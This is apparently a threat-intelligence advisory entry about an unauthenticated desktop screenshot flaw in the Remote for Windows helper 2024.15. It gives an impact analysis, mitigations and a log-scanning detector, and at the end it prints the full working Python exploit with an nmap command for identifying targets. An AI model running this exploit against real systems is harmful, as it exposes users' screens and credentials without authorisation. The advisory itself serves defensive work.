Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
AI Analysis
Technical Summary
The Windows 2024.15 Unauthenticated Desktop Screenshot Capture exploit targets a vulnerability in the Remote for Windows helper service, specifically the /api/getScreenshot API endpoint. This endpoint lacks proper authentication checks, allowing unauthenticated remote attackers to capture screenshots of the desktop environment, including login screens, with SYSTEM-level privileges. The vulnerability is exploitable when the "Allow unknown devices" setting is enabled, which is disabled by default but may be enabled in some configurations. The exploit leverages the absence of authentication on the API endpoint to send a crafted HTTPS GET request to the target service, which responds with a JPEG image of the current desktop session. The exploit code is implemented in Python 3 and uses the requests library to send the request and save the screenshot locally if successful. Identification of vulnerable systems can be aided by scanning for SSL certificates with the subject "CN=SecureHTTPServer/O=Evgeny Cherpak/C=US," which is associated with the Remote for Windows helper service. The vulnerability affects Windows 10 and 11 systems running the Remote for Windows helper version 2024.15. No official patches or vendor advisories are currently available, and there are no known exploits in the wild at the time of publication. However, the presence of publicly available exploit code increases the risk of exploitation. This vulnerability compromises confidentiality by exposing potentially sensitive desktop content without any authentication, while also impacting integrity and availability indirectly by enabling reconnaissance and potential follow-up attacks. The exploit requires no user interaction or authentication, making it highly accessible to remote attackers who can reach the vulnerable service over the network.
Potential Impact
For European organizations, this vulnerability poses a significant risk to confidentiality, as attackers can remotely capture screenshots of desktops, including sensitive information displayed on login screens or active sessions. This could lead to exposure of credentials, confidential documents, or other sensitive data. Organizations in sectors such as finance, healthcare, government, and critical infrastructure are particularly at risk due to the potential leakage of sensitive operational or personal data. The SYSTEM-level access context of the screenshots indicates that the service runs with high privileges, increasing the severity of the information exposure. Additionally, the ability to capture login screens may facilitate further attacks such as credential harvesting or session hijacking. The exploit's reliance on the "Allow unknown devices" setting being enabled means that organizations with lax security configurations or those that enable this setting for operational reasons are more vulnerable. The lack of authentication on the API endpoint also suggests a design flaw that could be exploited in other ways. The availability of a working exploit in Python lowers the barrier for attackers, potentially increasing the likelihood of targeted attacks against European enterprises. The impact extends beyond confidentiality to potential reputational damage, regulatory non-compliance (e.g., GDPR violations due to data exposure), and increased risk of subsequent intrusions.
Mitigation Recommendations
1. Immediately audit and disable the "Allow unknown devices" setting in the Remote for Windows helper service if it is enabled, as this setting directly enables the exploit.
2. Restrict network access to the Remote for Windows helper service, ideally limiting it to trusted management networks or VPNs, to prevent unauthorized external access.
3. Implement network-level controls such as firewall rules or intrusion prevention systems to detect and block requests to the /api/getScreenshot endpoint, especially those lacking proper authentication headers.
4. Monitor network traffic for anomalous HTTPS requests targeting the vulnerable API endpoint, particularly those with suspicious client tokens or host headers as seen in the exploit code.
5. Conduct a comprehensive inventory of Windows 10 and 11 systems running the Remote for Windows helper version 2024.15 and prioritize patching or upgrading once vendor fixes become available.
6. Employ endpoint detection and response (EDR) tools to detect unusual API calls or unauthorized screenshot capture activities.
7. Educate IT and security teams about this vulnerability and the risks of enabling permissive device connection settings.
8. If possible, disable or uninstall the Remote for Windows helper service on systems where it is not strictly required.
9. Engage with the vendor to obtain patches or mitigations and apply them promptly upon release.
10. Implement multi-factor authentication and other compensating controls to mitigate risks from potential credential exposure.
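As an added example (not from the advisory, the exploit author or the vendor), the following Python detector applies recommendations 3 and 4: it scans access-log lines for requests to /api/getScreenshot from outside a trusted management network, for requests carrying no client token, and for the fixed header values used by the published PoC. The log-line layout, the trusted network range and the sample lines are constructed assumptions; because the helper speaks HTTPS, such logs exist only where a TLS-inspecting proxy or WAF sits in front of it.

```python
import ipaddress

SCREENSHOT_PATH = "/api/getScreenshot"
# Header values hard-coded in the published PoC on this page.
POC_MARKERS = {
    "X-ClientToken": "exploit",
    "X-HostName": "attacker-pc",
    "X-HostFullModel": "exploit-device",
}
# Assumed management network permitted to reach the helper (recommendation 2).
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/24")]

# Constructed sample log, one request per line: "<ts> <src_ip> <method> <path> [Header=value ...]"
SAMPLE_LOG = """\
2025-06-10T20:58:01Z 10.0.0.5 GET /api/getScreenshot X-ClientToken=exploit X-HostName=attacker-pc X-HostFullModel=exploit-device
2025-06-10T20:58:05Z 10.0.0.7 GET /api/getScreenshot X-ClientToken=7c1e9b X-HostName=alice-phone X-HostFullModel=iPhone15,2
2025-06-10T20:58:09Z 10.0.0.9 GET /api/status X-ClientToken=exploit
2025-06-10T20:58:12Z 198.51.100.23 GET /api/getScreenshot
"""

def parse_line(line):
    """Split one constructed log line into its fields; headers become a dict."""
    ts, src, method, path, *hdrs = line.split()
    headers = dict(h.split("=", 1) for h in hdrs if "=" in h)
    return {"ts": ts, "src": src, "method": method, "path": path, "headers": headers}

def classify(req):
    """Return the reasons a request is suspicious; an empty list means benign."""
    reasons = []
    # Any request reusing the PoC's literal header values is a strong signal on any path.
    hits = [k for k, v in POC_MARKERS.items() if req["headers"].get(k) == v]
    if hits:
        reasons.append("poc-marker:" + ",".join(sorted(hits)))
    if req["path"] == SCREENSHOT_PATH:
        src = ipaddress.ip_address(req["src"])
        if not any(src in net for net in TRUSTED_NETS):
            reasons.append("untrusted-source")
        if "X-ClientToken" not in req["headers"]:
            reasons.append("no-client-token")
    return reasons

def scan(log_text):
    """Return (ts, src, path, reasons) for every suspicious request in the log."""
    alerts = []
    for line in filter(str.strip, log_text.splitlines()):
        req = parse_line(line)
        reasons = classify(req)
        if reasons:
            alerts.append((req["ts"], req["src"], req["path"], reasons))
    return alerts
```

Calling scan(SAMPLE_LOG) flags the first, third and fourth sample lines; the second (trusted source, non-PoC token) is treated as a legitimately paired device.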
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Belgium, Sweden, Finland
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
# Date: 2025-05-19
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)

'''
Description:
- Exploits the getScreenshot API endpoint in Remote for Windows helper service
- Works when "Allow unknown devices" setting is enabled (default: disabled)
- Captures current desktop including login screens (SYSTEM-level access)

Vulnerable Component:
- /api/getScreenshot endpoint with missing authentication checks

# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''

#!/usr/bin/env python3
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

# The helper presents a self-signed certificate, so certificate verification is disabled.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def capture_screenshot(ip, port, output_file):
    try:
        response = requests.get(
            f"https://{ip}:{port}/api/getScreenshot",
            headers={
                "X-ClientToken": "exploit",
                "X-HostName": "attacker-pc",
                "X-HostFullModel": "exploit-device"
            },
            verify=False,
            timeout=15
        )
        # A JPEG body begins with the SOI marker FF D8.
        if response.status_code == 200 and response.content.startswith(b'\xff\xd8'):
            with open(output_file, 'wb') as f:
                f.write(response.content)
            print(f"[+] Saved: {output_file}")
            return True
        print(f"[-] Failed: HTTP {response.status_code}")
        return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <IP> <PORT> <output.jpg>")
        sys.exit(1)
    sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3]) else 1)
```
Technical Details
- Edb Id: 52300
- Has Exploit Code: true
- Code Language: python
Threat ID: 68489dc07e6d765d51d531e9
Added to database: 6/10/2025, 9:04:00 PM
Last enriched: 6/11/2025, 9:14:24 PM
Last updated: 8/15/2025, 1:02:17 PM